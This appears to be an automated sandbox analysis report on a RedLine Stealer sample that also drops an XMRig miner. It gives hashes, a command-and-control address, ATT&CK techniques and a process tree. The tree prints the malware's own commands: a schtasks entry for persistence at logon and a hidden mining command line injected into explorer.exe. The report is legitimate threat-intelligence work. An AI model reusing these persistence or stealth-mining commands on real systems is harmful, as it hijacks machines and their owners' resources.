redline | 299dc3bb613a10e1a2d96c3e49d62d42145b1a48fbd6a087da6cc56661e82546

General

Target

mixruzki_20210714-064055.exe
Size

363KB
MD5

e82ce292a4c410c44c1f4da25d02a167
SHA1

61d4f9a1ea9457e667006bb8c8911c91ab00c487
SHA256

299dc3bb613a10e1a2d96c3e49d62d42145b1a48fbd6a087da6cc56661e82546
SHA512

0bc579f87ed5466d30466ae10df8378417c1d8424a867bc488faf09558967ca592846148b8ea77b7c6a729e5c754cd4d77b9f23346b0669906467a0d487a3971

Score

10^/10

redline xmrig test1 discovery infostealer miner spyware stealer

Malware Config

Extracted

Family

redline

Botnet

test1

C2

185.215.113.63:23098

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2636-119-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/2636-120-0x0000000000417EA2-mapping.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2628-162-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/2628-163-0x00000001402EB66C-mapping.dmp	xmrig
behavioral2/memory/2628-165-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

71120815.exesihost64.exeservices64.exe

pid process

3472 71120815.exe
3164 sihost64.exe
2104 services64.exe
Cryptocurrency Miner
Makes network request to known mining pool URL.
miner
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
3472	71120815.exe
3164	sihost64.exe
2104	services64.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

mixruzki_20210714-064055.exeservices64.exe

description	pid	process	target process
PID 3128 set thread context of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 2104 set thread context of 2628	2104	services64.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2380 schtasks.exe
2192 schtasks.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

mixruzki_20210714-064055.exe71120815.exeservices64.exe

pid process

2636 mixruzki_20210714-064055.exe
2636 mixruzki_20210714-064055.exe
3472 71120815.exe
3472 71120815.exe
2104 services64.exe

pid	process
2380	schtasks.exe
2192	schtasks.exe

pid	process
2636	mixruzki_20210714-064055.exe
2636	mixruzki_20210714-064055.exe
3472	71120815.exe
3472	71120815.exe
2104	services64.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

mixruzki_20210714-064055.exe71120815.exeservices64.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2636	mixruzki_20210714-064055.exe
Token: SeDebugPrivilege	3472	71120815.exe
Token: SeDebugPrivilege	2104	services64.exe
Token: SeLockMemoryPrivilege	2628	explorer.exe
Token: SeLockMemoryPrivilege	2628	explorer.exe

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mixruzki_20210714-064055.exemixruzki_20210714-064055.exe71120815.execmd.exeservices64.execmd.exe

description	pid	process	target process
PID 3128 wrote to memory of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 3128 wrote to memory of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 3128 wrote to memory of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 3128 wrote to memory of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 3128 wrote to memory of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 3128 wrote to memory of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 3128 wrote to memory of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 3128 wrote to memory of 2636	3128	mixruzki_20210714-064055.exe	mixruzki_20210714-064055.exe
PID 2636 wrote to memory of 3472	2636	mixruzki_20210714-064055.exe	71120815.exe
PID 2636 wrote to memory of 3472	2636	mixruzki_20210714-064055.exe	71120815.exe
PID 3472 wrote to memory of 360	3472	71120815.exe	cmd.exe
PID 3472 wrote to memory of 360	3472	71120815.exe	cmd.exe
PID 360 wrote to memory of 2380	360	cmd.exe	schtasks.exe
PID 360 wrote to memory of 2380	360	cmd.exe	schtasks.exe
PID 3472 wrote to memory of 3164	3472	71120815.exe	sihost64.exe
PID 3472 wrote to memory of 3164	3472	71120815.exe	sihost64.exe
PID 3472 wrote to memory of 2104	3472	71120815.exe	services64.exe
PID 3472 wrote to memory of 2104	3472	71120815.exe	services64.exe
PID 2104 wrote to memory of 2324	2104	services64.exe	cmd.exe
PID 2104 wrote to memory of 2324	2104	services64.exe	cmd.exe
PID 2324 wrote to memory of 2192	2324	cmd.exe	schtasks.exe
PID 2324 wrote to memory of 2192	2324	cmd.exe	schtasks.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe
PID 2104 wrote to memory of 2628	2104	services64.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe
"C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3128

C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe
C:\Users\Admin\AppData\Local\Temp\mixruzki_20210714-064055.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636

C:\Users\Admin\AppData\Local\Temp\71120815.exe
"C:\Users\Admin\AppData\Local\Temp\71120815.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:360

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:2380

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:3164

C:\Users\Admin\AppData\Local\Temp\services64.exe
"C:\Users\Admin\AppData\Local\Temp\services64.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:2324

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
6⤵
- Creates scheduled task(s)
PID:2192

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com --user=hidminer@protonmail.com --pass= --cpu-max-threads-hint=30 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Credentials in Files

2

T1081

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

2

T1005

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mixruzki_20210714-064055.exe.log
MD5
7438b57da35c10c478469635b79e33e1

SHA1
5ffcbdfbfd800f67d6d9d6ee46de2eb13fcbb9a5

SHA256
b253c066d4a6604aaa5204b09c1edde92c410b0af351f3760891f5e56c867f70

SHA512
5887796f8ceb1c5ae790caff0020084df49ea8d613b78656a47dc9a569c5c86a9b16ec2ebe0d6f34c5e3001026385bb1282434cc3ffc7bda99427c154c04b45a

Download Submit
C:\Users\Admin\AppData\Local\Temp\71120815.exe
MD5
ef460c0a6998ba8f81b18efbd42ef21d

SHA1
27e5a5345ae708facb0a644648a6e84fa7fc4899

SHA256
63d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4

SHA512
660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\71120815.exe
MD5
ef460c0a6998ba8f81b18efbd42ef21d

SHA1
27e5a5345ae708facb0a644648a6e84fa7fc4899

SHA256
63d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4

SHA512
660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe
MD5
ef460c0a6998ba8f81b18efbd42ef21d

SHA1
27e5a5345ae708facb0a644648a6e84fa7fc4899

SHA256
63d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4

SHA512
660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe
MD5
ef460c0a6998ba8f81b18efbd42ef21d

SHA1
27e5a5345ae708facb0a644648a6e84fa7fc4899

SHA256
63d38ae546f811d04a1c9bf42a30c555d17cf0a58710fa10d952b7aca0c916f4

SHA512
660e2e230d2db3132a890ba419628bfbe1174002d74b166323d7eebf4775900aa383ebcd179564f4155beb804e269d02ebaba9e2d5e65ae0405699c9d3ee9a2b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
5cb459f1bd32583f0f8488777d5b85ab

SHA1
3cf61e2dfab52fa45ec8fc70f7a2f62a7d9e4e02

SHA256
044b03caef2acf7273c10472a8d7c6e43df2d4c0f5d371497885b1eb881f803d

SHA512
1dd0285756c20bc03a70703f9431b86ec331bc591b19deae752064d46d4d7cd05e2afde04306dcb147ba6e218ab4b1dbe78e27f37297ac1256a19f80e6d6a7fb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
5cb459f1bd32583f0f8488777d5b85ab

SHA1
3cf61e2dfab52fa45ec8fc70f7a2f62a7d9e4e02

SHA256
044b03caef2acf7273c10472a8d7c6e43df2d4c0f5d371497885b1eb881f803d

SHA512
1dd0285756c20bc03a70703f9431b86ec331bc591b19deae752064d46d4d7cd05e2afde04306dcb147ba6e218ab4b1dbe78e27f37297ac1256a19f80e6d6a7fb

Download Submit
memory/360-141-0x0000000000000000-mapping.dmp

Download
memory/2104-147-0x0000000000000000-mapping.dmp

Download
memory/2104-160-0x000000001C230000-0x000000001C231000-memory.dmp

Filesize
4KB

Download
memory/2104-159-0x00000000010E0000-0x00000000010E2000-memory.dmp

Filesize
8KB

Download
memory/2192-157-0x0000000000000000-mapping.dmp

Download
memory/2324-156-0x0000000000000000-mapping.dmp

Download
memory/2380-142-0x0000000000000000-mapping.dmp

Download
memory/2628-163-0x00000001402EB66C-mapping.dmp

Download
memory/2628-165-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/2628-162-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/2628-164-0x0000000002990000-0x00000000029B0000-memory.dmp

Filesize
128KB

Download
memory/2636-119-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/2636-127-0x0000000005230000-0x0000000005231000-memory.dmp

Filesize
4KB

Download
memory/2636-124-0x0000000005710000-0x0000000005711000-memory.dmp

Filesize
4KB

Download
memory/2636-125-0x0000000005190000-0x0000000005191000-memory.dmp

Filesize
4KB

Download
memory/2636-132-0x00000000068E0000-0x00000000068E1000-memory.dmp

Filesize
4KB

Download
memory/2636-131-0x0000000006E10000-0x0000000006E11000-memory.dmp

Filesize
4KB

Download
memory/2636-134-0x0000000007840000-0x0000000007841000-memory.dmp

Filesize
4KB

Download
memory/2636-133-0x0000000006BF0000-0x0000000006BF1000-memory.dmp

Filesize
4KB

Download
memory/2636-130-0x0000000006710000-0x0000000006711000-memory.dmp

Filesize
4KB

Download
memory/2636-120-0x0000000000417EA2-mapping.dmp

Download
memory/2636-129-0x00000000054A0000-0x00000000054A1000-memory.dmp

Filesize
4KB

Download
memory/2636-128-0x0000000005100000-0x0000000005706000-memory.dmp

Filesize
6.0MB

Download
memory/2636-126-0x00000000051F0000-0x00000000051F1000-memory.dmp

Filesize
4KB

Download
memory/3128-118-0x0000000004B30000-0x0000000004B31000-memory.dmp

Filesize
4KB

Download
memory/3128-114-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/3128-116-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/3128-117-0x0000000004900000-0x0000000004901000-memory.dmp

Filesize
4KB

Download
memory/3164-154-0x0000000000F10000-0x0000000000F12000-memory.dmp

Filesize
8KB

Download
memory/3164-158-0x000000001C310000-0x000000001C312000-memory.dmp

Filesize
8KB

Download
memory/3164-148-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/3164-144-0x0000000000000000-mapping.dmp

Download
memory/3472-143-0x0000000000DD0000-0x0000000000DD2000-memory.dmp

Filesize
8KB

Download
memory/3472-140-0x0000000000E00000-0x0000000000E0B000-memory.dmp

Filesize
44KB

Download
memory/3472-138-0x00000000005E0000-0x00000000005E1000-memory.dmp

Filesize
4KB

Download
memory/3472-135-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads